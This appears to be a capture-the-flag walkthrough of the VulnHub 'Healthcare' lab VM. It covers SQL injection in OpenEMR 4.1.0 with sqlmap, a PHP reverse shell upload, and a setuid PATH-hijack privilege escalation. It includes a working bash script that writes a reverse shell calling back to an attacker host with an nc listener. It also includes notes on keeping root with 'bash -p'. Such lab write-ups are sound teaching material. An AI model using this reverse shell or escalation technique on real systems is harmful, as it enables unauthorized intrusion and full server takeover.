Tuesday, March 1, 2022

HEALTHCARE

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Healthcare, from the VulnHub pentesting platform.

Healthcare can be downloaded from here:

https://www.vulnhub.com/entry/healthcare-1,522/

- Once the virtual machine is downloaded, extracted and imported into VirtualBox:

2 - ENUMERATION

- Discovering IP 192.168.1.46:

- Scanning with Nmap:


- Scanning port 21 in more depth:

- Scanning port 80 in more depth:

- Browsing the web server:

- Viewing the page source, there is some misleading information:

- For instance, the folder /admin leads nowhere:

- Directory brute-forcing with rockyou.txt as the wordlist:

- There is a hidden folder called openemr:

- OpenEMR is an open-source electronic medical records and practice management application:

3 - EXPLOITATION

- Looking for exploits for OpenEMR version 4.1.0:

- Reading 49742.py reveals a SQL injection point that can be fed to sqlmap:

- Enumerating databases with sqlmap:

- Enumerating the tables inside the database openemr:

- Dumping the table users reveals cleartext passwords for two users:

- So finally we have credentials admin:ackbar and medical:medical.

- Logging into OpenEMR as user admin:

- User admin has access to the administration interface:

- The website files are stored under /var/www/html/openemr/sites/default:

- Let's create a PHP reverse shell named myshell.php:

- Uploading myshell.php to /var/www/html/openemr/sites/default is not allowed:

- However, it is possible to upload myshell.php to /openemr:

- Setting up a listener on port 3333:

- Now, simply requesting myshell.php with curl gives us a remote shell:
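
- The three steps above (write the PHP reverse shell, start the listener, trigger it with curl) as an added example. This is not the walkthrough's own myshell.php: the payload below uses fsockopen() plus proc_open() to hand /bin/sh's stdin, stdout and stderr to the socket, and LHOST, LPORT and the target URL are placeholders to fill in.

```bash
#!/bin/bash
# Added example, not the page's original myshell.php. The attacker address
# (LHOST), port (LPORT) and target URL are assumptions for illustration.

# make_php_revshell LHOST LPORT OUTFILE
# Writes a PHP reverse shell that connects back to LHOST:LPORT and attaches
# an interactive /bin/sh to the socket.
make_php_revshell() {
    local lhost="$1" lport="$2" out="$3"
    cat > "$out" <<EOF
<?php
// Connect back to the attacker's listener (30 s timeout).
\$sock = fsockopen("$lhost", $lport, \$errno, \$errstr, 30);
if (!\$sock) {
    die("connect failed: \$errstr (\$errno)");
}
// Wire the shell's stdin (0), stdout (1) and stderr (2) straight to the socket.
\$desc = array(0 => \$sock, 1 => \$sock, 2 => \$sock);
\$proc = proc_open("/bin/sh -i", \$desc, \$pipes);
if (is_resource(\$proc)) {
    proc_close(\$proc);
}
EOF
}

# Syntax-check the generated file when a php binary is available; on hosts
# without PHP this is a no-op so the example still runs.
lint_php() {  # lint_php FILE
    if command -v php >/dev/null 2>&1; then
        php -l "$1" >/dev/null
    fi
}

# Listener side (attacker box): start this *before* triggering the shell.
start_listener() {  # start_listener LPORT
    nc -lvnp "$1"
}

# Trigger: a plain GET is enough, the web server executes the PHP on request.
# curl never gets a normal response (the script blocks holding the shell),
# so give it a short timeout and ignore the output.
trigger_shell() {  # trigger_shell URL
    curl -s --max-time 5 "$1" >/dev/null || true
}

# Usage on the attacker machine (placeholders, fill in for the lab):
#   make_php_revshell <LHOST> 3333 myshell.php   # then upload it via OpenEMR
#   start_listener 3333                           # terminal 1
#   trigger_shell http://192.168.1.46/openemr/myshell.php   # terminal 2
```

The reason the upload to sites/default failed but /openemr worked is a filesystem permission difference on the target, so check where the web server's user can write before choosing an upload path; the payload itself is the same in both cases.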

4 - CAPTURING THE 1st FLAG

- Browsing /home we find an additional user called almirant:

- Inside almirant's home folder we find user.txt and the 1st flag:

5 - PRIVILEGE ESCALATION

- Looking for files with the setuid bit set:

- For instance, the file healthcheck is owned by root and, because of its setuid bit, runs with root privileges when user medical executes it:

- Running healthcheck:

- Running strings on healthcheck shows that it calls commands such as fdisk, ifconfig, du, ... by bare name, without their full paths (/bin, /sbin), so they are resolved through the caller's PATH:

- So, moving to /tmp, let's write a new script named fdisk containing /bin/bash, make it executable, and then prepend /tmp to the PATH environment variable:


- Now, when healthcheck (setuid root) calls fdisk, the lookup finds /tmp/fdisk first and executes /bin/bash as root.

- Running healthcheck again finally gives us a root shell:
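
- The PATH hijack above, as an added self-contained model that is not the VM's healthcheck binary: victim_healthcheck stands in for the setuid program and calls fdisk by bare name exactly as strings showed, plant_fake_fdisk drops the malicious fdisk, and the two helpers show which fdisk gets resolved and run once the directory is prepended to PATH. The lab directory comes from mktemp rather than /tmp, and the planted script prints a marker instead of spawning a shell, so it runs harmlessly on any host.

```bash
#!/bin/bash
# Added example modelling the PATH hijack; not the target's healthcheck.

# Stand-in for healthcheck: a bare-name call, so the first "fdisk" found on
# $PATH wins. (The real binary is a setuid ELF; this function only shows which
# fdisk gets resolved, not actual privilege gain.)
victim_healthcheck() {
    fdisk -l 2>&1 | head -n 1
}

# Plant a fake fdisk in DIR. Here the payload prints a marker; on the target it
# would be "/bin/bash -p" (plain bash resets its effective uid to the real uid
# when they differ, so without -p the hijacked shell would not stay root).
plant_fake_fdisk() {  # plant_fake_fdisk DIR
    local dir="$1"
    cat > "$dir/fdisk" <<'EOF'
#!/bin/sh
echo "HIJACKED by $0 as uid=$(id -u)"
EOF
    chmod +x "$dir/fdisk"
}

# Print the path that "fdisk" resolves to once DIR is prepended to PATH.
# A subshell keeps the PATH change local to this lookup.
resolve_fdisk() {  # resolve_fdisk DIR
    local dir="$1"
    ( PATH="$dir:$PATH"; export PATH; command -v fdisk )
}

# Run the victim with the hijacked PATH and return its first output line.
run_hijacked() {  # run_hijacked DIR
    local dir="$1"
    ( PATH="$dir:$PATH"; export PATH; victim_healthcheck )
}

# Demo, mirroring the steps on the target:
#   lab="$(mktemp -d)"
#   plant_fake_fdisk "$lab"
#   resolve_fdisk "$lab"   # prints "$lab/fdisk" rather than /sbin/fdisk
#   run_hijacked "$lab"    # prints the HIJACKED marker
#   rm -rf "$lab"
```

If the shell that comes back on the target is still the unprivileged user, the cause is bash dropping privileges: use `/bin/bash -p` in the fake fdisk, or have it copy /bin/bash somewhere and `chmod u+s` the copy, then run that copy with -p. The fix on the defending side is the mirror image: a setuid binary must call helpers by absolute path or reset PATH to a known value before calling system()-style functions.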

6 - CAPTURING THE 2nd FLAG

- Reading root.txt: